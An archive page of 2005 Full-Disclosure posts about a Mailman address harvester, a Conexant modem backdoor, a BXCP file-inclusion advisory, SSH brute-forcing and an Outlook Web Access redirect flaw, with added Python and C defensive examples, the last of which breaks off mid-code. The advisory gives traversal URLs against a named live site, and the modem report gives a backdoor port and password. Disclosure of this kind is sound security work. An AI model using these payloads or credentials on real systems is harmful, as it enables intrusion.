On Sat, 12 Feb 2005 02:48:56 +0100, Bernhard Kuemel said:

> If hashcash (http://www.hashcash.org/) gets integrated in our mail
> systems we no longer need to hide or obfuscate our email addresses.

And I overlooked the most fatal flaw in hashcash:

Hashcash really sucks if you're a mail server admin who has to crank 50,000
hash cashes a day at 5 CPU seconds a pop because people forgot to whitelist
your server.

Hashcash isn't even a tiny speed bump if you're a spammer and have 50,000
zombies - each one only takes a 5 second hiccup and continues spamming




Re: [Full-Disclosure] Re: [Mailman-Developers] mailman email harvester

2005-02-11 Thread Valdis . Kletnieks
On Sat, 12 Feb 2005 02:48:56 +0100, Bernhard Kuemel said:

> If hashcash (http://www.hashcash.org/) gets integrated in our mail
> systems we no longer need to hide or obfuscate our email addresses.

On the other hand, widespread distribution of hashcash will probably mean
the end of many mailing lists, because you can't trust users to actually
whitelist everything they subscribe to.  And remember that the whole *idea*
of hashcash is that you make it impractical for somebody to send 3,000 pieces
of mail.  I'm sure netsys.com wouldn't want to keep full-disclosure if they had
to do hashcash for even 10% of their users.

I'll go out on a limb and predict that if hashcash catches on, most major
mailing list packages will quickly acquire features to auto-unsub and
auto-blacklist all addresses from domains that present a hashcash challenge,
just out of self-defense. (And yes, unsub and blacklist *the entire domain* -
if foo.com is bouncing mail that hasn't been whitelisted, you have to
ban foo.com from all your lists.  Otherwise you can be DoS'ed (either
intentionally or accidentally) by simply subscribing 15 or 20 addresses
and "forgetting" to whitelist the mailing list...

I'll overlook the issues caused when you *dont know* what to whitelist.
For instance - many mailing lists (including this one) have a "confirmation
of subscription" check.  For bonus points - should you have whitelisted:

a) full-disclosure@lists.netsys.com (the actual list name)
b) [EMAIL PROTECTED] (the rfc822 header on my confirm)
c) [EMAIL PROTECTED] (the rfc821 MAIL FROM:)
d) mailman@
e) majordomo@
f) listserv@

(One or more answers may or may not be correct.  Remember that at the time
you send your subscription request, you probably have not actually seen any
mail from the site, so you can't say "whitelist the address this mail came 
from"...)

There's also all the stuff that things like amazon, ebay, your bank,
your insurance company, your utility companies, etc... all send out,
that users will forget to whitelist.

But yeah, other than all those minor details, hashcash is a fine solution. ;)




[Full-Disclosure] Re: [Mailman-Developers] mailman email harvester

2005-02-11 Thread Bernhard Kuemel
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Thomas Hochstein wrote:
|> Given the risk, now made worse by Bernhard's very helpfully
|> distributing this script for spammers, this is a really urgent
|> issue.
|
| Since it is known for many *years* that spammers are harvesting
| addresses from ML-archives, and since anybody can see that
| replacing "at" with "@" is ... not a very hard task, I fail to
| see any urgency here (or any problem in the very simple script
| Bernhard distributed).
There may be no urgency but something should be done. Obviously
there is a problem (as can also be seen by the emotions). Since the
only solution we found for now is not to publish the email
addresses, we should do that.
I pointed this out over a year ago and the number of vulnerable
lists only grew. Probably because being able to see who else is on
the list is a nice feature which we don't want to give up. We
repress the problem: We think, spammers don't exploit it because
they find enough addresses elsewhere. But spammers are smart: They
play a lot of tricks to pass spam filters, they defeat graphical
Turing tests to semiautomatically sign up email accounts which they
use for spamming, they make worms which act as mail relays.
They probably already harvest mailing list subscriber addresses and
if they don't do so by now, they sure will, sooner or later. But
they would be fools to tell us about it. We would lock our email
addresses away from them.
I am writing the exploit code not for the spammers. They may already
have one. I'm writing it to wake us up and treat this problem properly.
Brad Knowles wrote:
|> However, still many lists either have the member list openly
|> published, or available to the list members.
|
| True enough.  However, even if we changed the default in Mailman
| to be accessible only to the list administrator, it would take a
| very, very long time before 50% of all Mailman installations were
| secured in this manner.
I hope my exploit code will speed this up. I plan to release the
improved version, which harvests addresses restricted to subscribers
of about 100.000 mailing lists in several (3-6) months.
| That said, changing the default is probably the right thing to
| do.
Please include a note of the upcoming exploit. The current exploit
harvests about 600 lists where the addresses are published unrestricted.
| Moreover, it would be trivially easy for spammers to subscribe to
| the list and silently collect all address information that comes
| across.
|
| There's enough schemes out there for finding addresses that no
| one simple scheme is going to work, and the methods that we know
| will work are going to take a long time to become the default
| standard.
If hashcash (http://www.hashcash.org/) gets integrated in our mail
systems we no longer need to hide or obfuscate our email addresses.
Bernhard
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)
Comment: Using GnuPG with Debian - http://enigmail.mozdev.org
iD8DBQFCDWCH9zL78+QhnUgRAhSfAJ9WpPLARJ4bTG6ZPGH7anxc4FA5YwCdGn0C
nwSeZoHoitZKRA+6rE1hlFU=
=lM5z
-END PGP SIGNATURE-


[Full-Disclosure] Re: Nice call to ebx found

2005-02-11 Thread class 101
Yes this is for win2k's OS of course, XP and 2k3
anyway use stack protection which decreases the use of such offsets.

-class101
Jr. Researcher
Hat-Squad.com-


[Full-Disclosure] Re: yet another DSL modem backdoor - Mentor (Conexant)

2005-02-10 Thread Philip Barnham
The latest firmware fixes this issue; however, manufacturers are still 
selling these items with non-updated firmware.

I always recommend that anyone who buys one of these Conexant based routers 
upgrade the firmware; a bootable upgrade CD can be downloaded from 
www.origo-repair.org.uk

- Original Message - 
From: "Adam Laurie" <[EMAIL PROTECTED]>
To: "bugtraq" ; "full disclosure" 

Sent: Wednesday, February 09, 2005 6:58 PM
Subject: yet another DSL modem backdoor - Mentor (Conexant)


Amazingly, despite numerous reports of backdoors in these Conexant DSL 
routers, they are *still* being shipped with the port 254 backdoor menu 
enabled...

I've just switched ADSL provider, and the new modem they sent me was a 
"Mentor MR4C/UK". It appears to be another conexant clone, and if you 
telnet to port 254 you get the familiar:

01/01/99   CONEXANT SYSTEMS, INC. 00:00:38
 ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.27
and options to set password, reset router to default values, etc. etc. As 
before, you cannot change the login password on this interface, which is, 
in this case, "conexant".

Although this fault and the fix have been posted before, I report this as 
a reminder, and a nag to those feeble manufacturers that haven't got their 
act together...

To work around, set up virtual servers that send the port to a black hole.
If your ISP has shipped you one of these, *TELL* them! Maybe they have 
enough purchasing power to get it sorted...

cheers,
Adam
--
Adam Laurie Tel: +44 (20) 7605 7000
The Bunker Secure Hosting Ltd.  Fax: +44 (20) 7605 7099
Shepherds Building  http://www.thebunker.net
Rockley Road
London W14 0DA  mailto:[EMAIL PROTECTED]
UNITED KINGDOM  PGP key on keyservers


[Full-Disclosure] Re: Re: mailman email harvester

2005-02-09 Thread Dave Korn
"James Longstreet" wrote in message
news:[EMAIL PROTECTED]
> On Tue, 8 Feb 2005, Dave Korn wrote:
>
> >   Why?  You hoping to sell it to spammers?  Obfuscating *works*; if YOU
> > break it, that makes YOU a spamming motherfucker.  Why don't you go fuck
> > yourself instead?
>
> The name of the list is Full-Disclosure.  This is like saying "gets()
> works, if you show that it's unsafe, that makes YOU an evil evil hacker."

  He's already shown the POC "To raise awareness to this issue", and I have
no complaint about that.  But to continue and develop it into an actual
usable production-level tool serves no further purpose in raising awareness
and seems to me to be crossing the line into malware authoring; it's like
the difference between writing a POC showing a bug in SQL server and writing
MSBlast.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today





[Full-Disclosure] Re: Homograph attack fools (older versions of) Internet Explorer too

2005-02-09 Thread Kevin Connolly
Use of Unicode codes in the href fools older versions of IE when it parses
the hostname part.
Obviously this has been fixed in a previous patch (my bad for not checking with
a fully patched machine first! )
NOT vulnerable  IE 6.0.2800.1106.xpsp2.040919-1003C0
vulnerable  IE 6.0.2800.1106.xpsp2.030422-1633
I may get around to writing up the details but it is not urgent now that
I know that fully patched IE is not vulnerable to this.
Kevin


[Full-Disclosure] Re: mailman email harvester

2005-02-09 Thread Bernhard Kuemel
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Dana Hudes wrote:
| The report is good. Attaching the results in their entirety gives
| spammers who don't have your technical capability, not to mention
|  script kiddies looking for victims for their viruses, a huge leg
| up. Irresponsible doesn't begin to describe it.
So let's shut down full-disclosure.
| More appropriate would be specimens and a description of
| methodology.
I informed the mailman developers about the problem more than a year
ago and the number of vulnerable lists only increased:
http://www.mail-archive.com/mailman-developers@python.org/msg06853.html
If they don't spread the word someone else has to do it. I'm not
worried about the 60,000 email addresses. They asked for being this
example by being public. Let's hope this will make list admins
secure the addresses which are only available to subscribers (which
are a lot more).
Bye, Bernhard
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)
Comment: Using GnuPG with Debian - http://enigmail.mozdev.org
iD8DBQFCChum9zL78+QhnUgRAoO8AJ9E3ph/U0Czys+Zx2Dorzx/AamfYACfaELr
G+d9ospmfb902OzDZM4ci24=
=wzz9
-END PGP SIGNATURE-


[Full-Disclosure] Re: mailman email harvester

2005-02-09 Thread Bernhard Kuemel
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Dave Korn wrote:
|>An improved version that collects addresses that are restricted to
|>subscribers, processes more lists and works more parallelized is
|>planned.
|
|
| Why?
The addresses of mailing list subscribers are top quality to
spammers. It's just a matter of time until one exploits this. I'd
rather want us to close this hole before this happens.
| You hoping to sell it to spammers?
I'm on the anti spammers side, but hey, I'm rather low on money so
if there's a good offer, I just might do that. 1 cent/address. If it
collects 1 million addresses, that would be 10,000 euros. That's my
price. And there are programmers who don't have objections working
for spammers. They even make worms that act as mail relays. See how
real the danger is?
| Obfuscating *works*;
The report you cited is about individuals obfuscating addresses in
individual ways. Mailman is a widespread mailing list manager and
obfuscates very many addresses in a uniform way. This makes it much
more attractive for spammers. If you hoped this would remain
unnoticed by spammers I'm sorry to disappoint you, but security by
obscurity does not work.
| if YOU break it, that makes YOU a spamming motherfucker.
This seems to bother you. Would you feel better if someone else did
it without anyone noticing it? Hey, it may already be happening.
| Why don't you go fuck yourself instead?
I'm too busy fucking my girl friend.
|   Oh, and by the way
|
| <[EMAIL PROTECTED]>
Uh, fuck!
Oh, BTW, obscuring or hiding email addresses won't solve the
problem. Hashcash or ecash probably will.
Bernhard
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)
Comment: Using GnuPG with Debian - http://enigmail.mozdev.org
iD8DBQFCCg069zL78+QhnUgRAkaYAKCCBJ4joy49YPcxwVL4ZRAVcKmTtgCfSQc3
OvDsFCwDyg0tTnLd84RcpWg=
=iNhD
-END PGP SIGNATURE-


[Full-Disclosure] Re: Local *.php file inclusion and full path disclosure in BXCP <= 0.2.9.7

2005-02-08 Thread Majest
Author:  [OfB|FistFucker]  -  (Majest)
Contact: http://www.ofb-clan.de/
I've reported the vulnerability to the programmer of BXCP. He released a 
patch for 'index.php' and a new version (0.2.9.8). You can get it from: 
http://www.bxcp.com/

- Original Message - 
From: "Majest" <[EMAIL PROTECTED]>
To: 
Sent: Sunday, February 06, 2005 4:38 PM
Subject: Local *.php file inclusion and full path disclosure in BXCP <= 
0.2.9.7


Title:   Local *.php file inclusion and full path disclosure in BXCP <= 
0.2.9.7
Author:  [OfB|FistFucker]
Contact: http://www.ofb-clan.de/
#ofb-clan at irc.quakenet.org:6667

1. Local *.php file inclusion:
-
Because of no user input validation in 'index.php' it's possible to include
every local *.php file. Let's take a look at the most important part of the
source code:

 ~~ SOURCE CODE 
  $show = $_REQUEST['show'];
  require ("config.php");
  if (!file_exists("show/$show.php"))
  {
$notfound = $show;
$show = 'error';
  }
  $page = "show/$show.php";
  END ~~
 Yeah, there is no validation of the variable '$show'. So we can easily access
 every local file ending with '.php', also in restricted directories like
 htaccess. We can easily jump outside the 'show' directory and include every
 file ending with '.php'!

 Example URL: http://www.rz-liga.com/index.php?show=../intern/board/common
 Don't worry about the response "Hacking attempt". It's just a die() message
 from 'common.php' of their htaccess protected phpBB. ;-)

2. Full path disclosure:
---
 And by including the 'index.php' into itself with the above vulnerability we
 can cause a full path disclosure.

 Example URL: http://www.rz-liga.com/index.php?show=../index

3. Let's fix that shit! =)
-
 Just replace in 'index.php':
 ~~ SOURCE CODE 
  $show = $_REQUEST['show'];
  if(ereg("\.\.", $show))
  {
$show = '';
  }
  require ("config.php");
  if (!file_exists("show/$show.php"))
  {
$notfound = $show;
$show = 'error';
  }
  $page = "show/$show.php";
  END ~~
4. Greetings:

 Greetings fly out to all members of OfB-Clan that know me. And sorry for the
 events that occurred at and after the 25th December. Please forgive me and
 please stop seeing me as a criminal kiddie. Better see me as a guardian! =D


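The advisory's fix only rejects a literal ".." in `$show`. As an added illustration (not BXCP code; BXCP is PHP, and this is a Python re-implementation of the idea), here is the hardened shape a reviewer would ask for: a strict allow-list on the page name, then a containment check on the resolved path, so absolute paths, NUL bytes and traversal through symlinks are all rejected before any file is read. The directory layout, file names and probe strings are constructed for the demo; `resolve_page` and `page_for` are names chosen here, not BXCP functions.

```python
"""Safe resolution of a page-selector parameter such as BXCP's `show`.

Added illustration for the advisory above; not BXCP code, and the directory
layout is constructed here. The author's fix only rejects ".."; this version
keeps that idea but goes further: a character allow-list on the parameter,
then a containment check on the resolved path, which also catches NUL bytes,
absolute paths and traversal through symlinks.
"""
import os
import re
import tempfile
from typing import Dict, Optional

# Only bare page names: no separators, no dots, no NUL, bounded length.
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\Z")


def resolve_page(show: str, page_dir: str) -> Optional[str]:
    """Return the real path of <page_dir>/<show>.php, or None if rejected or missing."""
    if not PAGE_NAME.fullmatch(show):
        return None
    base = os.path.realpath(page_dir)
    candidate = os.path.realpath(os.path.join(base, show + ".php"))
    # Belt and braces: even if the allow-list were loosened later, the resolved
    # file must still live under the page directory.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def page_for(show: str, page_dir: str) -> str:
    """Mirror the original index.php flow: any rejection falls back to the error page."""
    return resolve_page(show, page_dir) or os.path.join(os.path.realpath(page_dir), "error.php")


def demo() -> Dict[str, bool]:
    """Constructed tree: show/news.php, show/error.php, and files outside show/."""
    root = tempfile.mkdtemp(prefix="bxcp-demo-")
    page_dir = os.path.join(root, "show")
    os.makedirs(page_dir)
    os.makedirs(os.path.join(root, "intern", "board"))
    for rel in ("show/news.php", "show/error.php", "intern/board/common.php", "index.php"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("<?php // placeholder\n")
    probes = [
        "news",                    # legitimate page
        "error",                   # legitimate page
        "../intern/board/common",  # the advisory's inclusion example
        "../index",                # the advisory's path-disclosure example
        "news/../../index",        # traversal that still ends in a page name
        "/etc/passwd",             # absolute path
        "news\x00",                # NUL truncation trick against older PHP
        "missing",                 # well-formed but nonexistent page
    ]
    return {p: resolve_page(p, page_dir) is not None for p in probes}


if __name__ == "__main__":
    for probe, accepted in demo().items():
        print(f"{probe!r:28} {'served' if accepted else 'rejected'}")
```

The allow-list alone would already stop every probe above; the `realpath` containment check is the second, independent line of defence, and it is the one that keeps working if someone later widens the pattern to allow subdirectories.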


Re: [Full-Disclosure] Re: mailman email harvester

2005-02-08 Thread J b
Take a look at the date of that report. It's from almost TWO
YEARS ago! The spammer/anti-spammer arms race began a long time ago,
and will only get worse.

I've seen numerous harvesters with randomized User-Agent strings
crawling a mail archive of mine, even though all output is filtered
through Apache::AntiSpam. They are NOT stopped by simple, obvious
regexps. Obfuscation is trivially easy to identify and defeat.

-Original Message-
From: Dave Korn [EMAIL PROTECTED] 
Sent: Tuesday, February 08, 2005 9:53 AM
To: full-disclosure@lists.netsys.com
Cc: mailman-developers@python.org; bugtraq@securityfocus.com
Subject: [Full-Disclosure] Re: mailman email harvester

  Yes, but no spammers actually do so.  For experimental proof of
this
claim,

http://www.cdt.org/speech/spam/030319spamreport.shtml





Re: [Full-Disclosure] Re: [USN-74-1] Postfix vulnerability

2005-02-08 Thread LaMont Jones
On Sun, Feb 06, 2005 at 09:20:38PM +0100, Martin Pitt wrote:
> This is already fixed in Sarge/Sid. However, I'm not sure about woody.
> LaMont, does Woody already include the IPv6 patch?

IPV6 support (from the third party patch) was introduced to Debian
in 2.1.1-2, woody has 1.1.11-0.woody3, sid/sarge have the fixed version.

lamont


Re: [Full-Disclosure] Re: mailman email harvester

2005-02-08 Thread James Longstreet
On Tue, 8 Feb 2005, Dave Korn wrote:

>   Why?  You hoping to sell it to spammers?  Obfuscating *works*; if YOU
> break it, that makes YOU a spamming motherfucker.  Why don't you go fuck
> yourself instead?

The name of the list is Full-Disclosure.  This is like saying "gets()
works, if you show that it's unsafe, that makes YOU an evil evil hacker."

> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>
> <[EMAIL PROTECTED]>

Just childish (and ineffective), really.

think more,
James Longstreet


[Full-Disclosure] Re: mailman email harvester

2005-02-08 Thread Dave Korn
"Bernhard Kuemel" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Hi!
>
> Tons of email addresses from mailman mailing lists are vulnerable to
> be collected by spammers.
>
> They are "protected" by obfuscation ([EMAIL PROTECTED] -> user at
> example.com) and access to the subscriber list can be restricted to
> subscribers. The obfuscation is trivially reversed and harvester
> scripts can subscribe to gain access to restricted lists.

  Yes, but no spammers actually do so.  For experimental proof of this
claim,

http://www.cdt.org/speech/spam/030319spamreport.shtml

" But none of the addresses that were obscured, whether in "human-readable"
or "HTML-obscured" form, received a single piece of spam, leading us to
conclude that e-mail address "harvesters" are not presently capable of
collecting such addresses. While this may change as time passes and
technology develops, for the time being it appears that obscuring an e-mail
address is an effective means of avoiding spam. "

  The harvesters don't bother because there are so many un-obfuscated email
addresses out there, enough to keep them busy for a lifetime of spamming,
anyway.

> An improved version that collects addresses that are restricted to
> subscribers, processes more lists and works more parallelized is
> planned.

  Why?  You hoping to sell it to spammers?  Obfuscating *works*; if YOU
break it, that makes YOU a spamming motherfucker.  Why don't you go fuck
yourself instead?

  Oh, and by the way

<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>



drop dead,
  DaveK
-- 
Can't think of a witty .sigline today





[Full-Disclosure] Re: Software Licenses and compression (was: Multiple AV Vendors ignoring tar.gz archives)

2005-02-07 Thread James Eaton-Lee
On Mon, 2005-02-07 at 14:58 -0500, bkfsec wrote:
> James Eaton-Lee wrote:
> 
> >Add to this the fact that implementing archive support in an antivirus
> >package isn't as simple as it might seem; although bz2 is released under
> >a BSD license, gzip isn't - it's GPL, and therefore any antivirus vendor
> >would have to write their gzip code totally from scratch. 
> >
> 
> Now this is a non sequitur.  It's a non sequitur for two reasons: 1) 
> It's irrelevant and 2) It's wrong.
> 
> First, it's irrelevant because if this is a perceived weakness of an 
> antivirus package (and I can see how someone can see it as undesirable 
> under certain conditions, though not all conditions) then its 
> implementation isn't the concern of the reporter.  We know that it can 
> be done and, if it's of high enough value, it should be done -- 
> regardless of whether they get the code from a third party or write it 
> themselves.
> 
> Second, it's wrong for a couple of reasons.  Yes, they would not be able 
> to take GNU gzip and implant the code into a proprietary application.  
> However, that does not bar them from utilizing and distributing GNU Gzip 
> with their application.  If they were to wish to use GNU Gzip, there are 
> ways that they could engineer that into their product without causing 
> licensing issues.  They could simply use gzip/tar to gunzip/untar the 
> package as a stream and pass that into their preprocessor for analysis 
> in their sandbox.  That would require no cross-polination of the 
> licenses and would leave the third party software intact.  These kinds 
> of arrangements are actually quite frequent in the world of software design.
> 
> Further, it's not like the gzip compression algorithm of some kind of 
> guarded secret proprietary protocol.  It's a standard protocol and there 
> are a number of proprietary implementations that could be licensed for 
> use in proprietary programs. 
> 
> In either case, including third-party software into a security product 
> can be a gambit and, as such, that code has to be heavily audited in 
> order to be included into the software suite.  Or, at least, it should 
> be heavily audited.  Anyway, they wouldn't be able to just take bzip2 
> and place it directly into the source of the AV system either.  
> Interfaces have to be crafted and tested, in order to be consistent.  
> You also have to take into account differences in the programming 
> environment for the AV/Compression scheme and optimizational concerns. 
> 
> In the end, your point in trying to differentiate the GNU GPL from the 
> BSD license here is completely and totally moot.  It does nothing but 
> predicate misunderstandings concerning the GNU GPL and further cloud 
> this potential security issue.

I wasn't trying to cloud the issue at all, nor was I specifically trying
to differentiate between the two - the paragraph you've just dissected
directly followed a statement about the relative lack of speed which
implementing archive support in an anti-virus package would necessitate
vs. simply writing a new antivirus definition, and the reference to GPL
and BSD software was preemptively negating a response along the lines of
'they could simply incorporate X source code'. 

I fully understand both the distinction between the two licenses, how
they can be implemented into a proprietary product, and the testing
involved in incorporating someone else's source code into a large
codebase - again, my point was that whether implementing gzip/bzip2/X
support in an antivirus package is hard or not, it is a reactive measure
which antivirus vendors do not (and should not) have to take, since
unlike antivirus definitions (which are necessarily written reactively),
compression support is easily integrated into a package - with
forethought - and prevents such issues further down the line; further to
that, I also argued that it would be silly to reactively implement
compression support not only because it's unnecessary, but also because
it would (as you have in fact agreed with me on) be harder to implement
this support into an anti-virus scanning engine even if, as you say,
this is a "standard protocol".

So I think you agree with me, really; thank you for your e-mail! :)

 - James.



[Full-Disclosure] Re: SSH probe attack afoot?

2005-02-07 Thread Barrie Dempster
On Sun, 2005-02-06 at 10:09 -0500, Bernie Cosell wrote:
> We're now getting hammered with the third round of ssh probes in the last 
> four days [one from CA, one from Brazil and one from Virginia].  I was 
> wondering: is there some virus or the like floating around now that 
> leaves an ssh-hammering zombie in its wake?  Or is it just coincidental 
> that we have gotten three floods?
> 
> [the probes are just dozens of random-seeming login attempts with a bunch 
> of root-password-guesses interspersed]
> 
>   /Bernie\


Multiple SSH brute force tools, which have been covered on this list and
others a few times over the last year.

http://www.securityfocus.com/archive/75/[EMAIL 
PROTECTED]/2005-02-04/2005-02-10/0
http://www.google.com/search?num=100&hl=en&safe=off&q=ssh+brute+force&spell=1

-- 
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue

blog: http://zeedo.blogspot.com
site: http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]




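Bernie describes the symptom (dozens of random-seeming login attempts with root guesses interspersed); the defender's counterpart is spotting it in the sshd log. The following is an added Python detector, not code from either poster, run over log lines constructed here in the OpenSSH syslog style (hostname `gw`, RFC 5737 documentation addresses, and the year 2005 supplied for the year-less syslog timestamps are all assumptions). It raises one alert per source address once failures within a sliding window cross a threshold, and separately tallies root guesses, which never appear in legitimate traffic on hosts that disallow root password login.

```python
"""Flag SSH password-guessing bursts in sshd log lines.

Added example for the "SSH probe attack" thread; the log lines below are
constructed in the OpenSSH syslog style, not taken from the poster's system.
The detector groups "Failed password" events by source address and alerts when
one address exceeds a threshold within a sliding window; root guesses are
tallied separately because they warrant attention even at low volume.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, Iterable, List, Tuple

# Matches e.g. "Feb  6 10:09:01 gw sshd[4021]: Failed password for invalid user
# admin from 192.0.2.10 port 4821 ssh2"; "Accepted password" lines do not match.
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

# Constructed sample: one burst from 192.0.2.10, a user typo from
# 198.51.100.7, and two slow root guesses from 203.0.113.5.
SAMPLE_LOG = """\
Feb  6 10:09:01 gw sshd[4021]: Failed password for invalid user admin from 192.0.2.10 port 4821 ssh2
Feb  6 10:09:02 gw sshd[4023]: Failed password for invalid user test from 192.0.2.10 port 4822 ssh2
Feb  6 10:09:02 gw sshd[4025]: Failed password for root from 192.0.2.10 port 4823 ssh2
Feb  6 10:09:03 gw sshd[4027]: Failed password for invalid user guest from 192.0.2.10 port 4824 ssh2
Feb  6 10:09:04 gw sshd[4029]: Failed password for root from 192.0.2.10 port 4825 ssh2
Feb  6 10:09:05 gw sshd[4031]: Failed password for invalid user oracle from 192.0.2.10 port 4826 ssh2
Feb  6 10:12:40 gw sshd[4100]: Failed password for bernie from 198.51.100.7 port 50122 ssh2
Feb  6 10:12:47 gw sshd[4102]: Accepted password for bernie from 198.51.100.7 port 50122 ssh2
Feb  6 11:30:00 gw sshd[4200]: Failed password for root from 203.0.113.5 port 3301 ssh2
Feb  6 11:40:00 gw sshd[4201]: Failed password for root from 203.0.113.5 port 3302 ssh2
"""

Alert = Tuple[str, int, str, str]  # (source ip, failures in window, first ts, last ts)


def parse_ts(ts: str, year: int = 2005) -> datetime:
    """Syslog timestamps carry no year; supply one so time deltas can be computed."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect(lines: Iterable[str], threshold: int = 5,
           window_seconds: int = 60) -> Tuple[List[Alert], Dict[str, int]]:
    """Return burst alerts (one per source) and a per-source count of root guesses."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    alerted = set()
    alerts: List[Alert] = []
    root_guesses: Dict[str, int] = defaultdict(int)
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue
        ip, user, ts = m["ip"], m["user"], parse_ts(m["ts"])
        if user == "root":
            root_guesses[ip] += 1
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()  # drop failures older than the sliding window
        if len(window) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append((ip, len(window),
                           window[0].strftime("%H:%M:%S"), ts.strftime("%H:%M:%S")))
    return alerts, dict(root_guesses)


def run_sample() -> Tuple[List[Alert], Dict[str, int]]:
    """Run the detector over the constructed sample."""
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    found, roots = run_sample()
    for ip, count, first, last in found:
        print(f"burst from {ip}: {count} failures between {first} and {last}")
    print("root guesses by source:", roots)
```

On the sample the burst from 192.0.2.10 is reported once, at the fifth failure; the single typo from 198.51.100.7 and the two root guesses from 203.0.113.5 ten minutes apart stay below the threshold, but the latter still show up in the root tally, which is the signal worth reviewing on a host where root password login should not happen at all.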


Re: [Full-Disclosure] re: Microsoft Outlook Web Access URL Injection

2005-02-07 Thread Valdis . Kletnieks
On Mon, 07 Feb 2005 09:27:25 PST, morning_wood said:
> looks like MS is NOT publicly releasing a fix for this, while they have the
> means and solution at hand.
> ( at least under IE )
> a kind reader sent this little snippet...
> 
> "... was able to get Microsoft to provide us with a DLL
> to drop under IIS 6 to compare URL variable against the Host: header
> variable and do 302 to web root if they are not similar.  This fixed the
> problem, however, I doubt that Microsoft will make this patch available to
> the public."
> 
> what happened to MS commitment to security???

They figured they'd spent the budget for the quarter for PR proclaiming their
commitment to security.  Remember - they're nowhere near as committed to
security as they are to the bottom line.  A $20M PR campaign will sway a lot
of managers, while a $200M project to actually fix things won't be noticed.
Which would *you* choose if you were them?

(Note that this is heavily dependent on corporate culture - for instance,
if some VP at Google tried that same money-saving stunt, he'd probably get
called in, pointed at the "Don't be evil" sign, and told to find some OTHER
way to save the $180M...  But as far as I know, there isn't any such sign
in Redmond)





[Full-Disclosure] re: Microsoft Outlook Web Access URL Injection

2005-02-07 Thread morning_wood
looks like MS is NOT publicly releasing a fix for this, while they have the
means and solution at hand.
( at least under IE )
a kind reader sent this little snippet...

"... was able to get Microsoft to provide us with a DLL
to drop under IIS 6 to compare URL variable against the Host: header
variable and do 302 to web root if they are not similar.  This fixed the
problem, however, I doubt that Microsoft will make this patch available to
the public."

what happened to MS's commitment to security???


ugg,

m.w
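The mitigation quoted above (compare the host named in the URL parameter against the request's Host: header and 302 to the web root on mismatch) is easy to state but has a few traps: case, an explicit port, a userinfo prefix (`http://host@evil/`) and scheme-relative `//evil/` targets. As an added example, not Microsoft's DLL and not code from the original post, here is that comparison in C. The helper names (`url_host`, `canon_host`, `redirect_is_local`) and the host names used are my own assumptions; a relative URL is treated as local because it cannot name another server.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Copy the host part of an absolute or scheme-relative URL into `host`
 * (scheme, userinfo, port, path and query stripped). Returns 0 when the URL
 * is relative, i.e. it cannot name another server. Hypothetical helper. */
static int url_host(const char *url, char *host, size_t hostlen)
{
    const char *p = strstr(url, "://");
    if (p != NULL)
        p += 3;
    else if (url[0] == '/' && url[1] == '/')
        p = url + 2;                    /* "//evil.example/x" is off-site */
    else
        return 0;
    const char *end = p + strcspn(p, "/?#");
    const char *at = memchr(p, '@', (size_t)(end - p));
    if (at != NULL)
        p = at + 1;                     /* drop userinfo: http://user@host/ */
    size_t n = (size_t)(end - p);
    const char *colon = memchr(p, ':', n);
    if (colon != NULL)
        n = (size_t)(colon - p);        /* drop :port */
    if (n >= hostlen)
        n = hostlen - 1;
    memcpy(host, p, n);
    host[n] = '\0';
    return 1;
}

/* Lower-case a host name and stop at any ":port" suffix. */
static void canon_host(const char *in, char *out, size_t outlen)
{
    size_t i;
    for (i = 0; i + 1 < outlen && in[i] != '\0' && in[i] != ':'; i++)
        out[i] = (char)tolower((unsigned char)in[i]);
    out[i] = '\0';
}

/* 1 if the redirect target stays on the host the client asked for (the
 * request's Host: header), 0 if it would send the client elsewhere and the
 * filter should answer 302 to the web root instead. */
int redirect_is_local(const char *url_param, const char *host_header)
{
    char raw[256], target[256], expected[256];
    if (!url_host(url_param, raw, sizeof raw))
        return 1;                       /* relative URL stays on this server */
    canon_host(raw, target, sizeof target);
    canon_host(host_header, expected, sizeof expected);
    return target[0] != '\0' && strcmp(target, expected) == 0;
}

int main(void)
{
    /* constructed inputs; the Host: header is what the client sent */
    const char *host = "mail.example.com";
    const char *targets[] = {
        "/exchange/",
        "https://MAIL.example.com:443/exchange/",
        "http://evil.example/owa",
        "//evil.example/owa",
        "http://mail.example.com@evil.example/",
    };
    for (size_t i = 0; i < sizeof targets / sizeof targets[0]; i++)
        printf("%-42s -> %s\n", targets[i],
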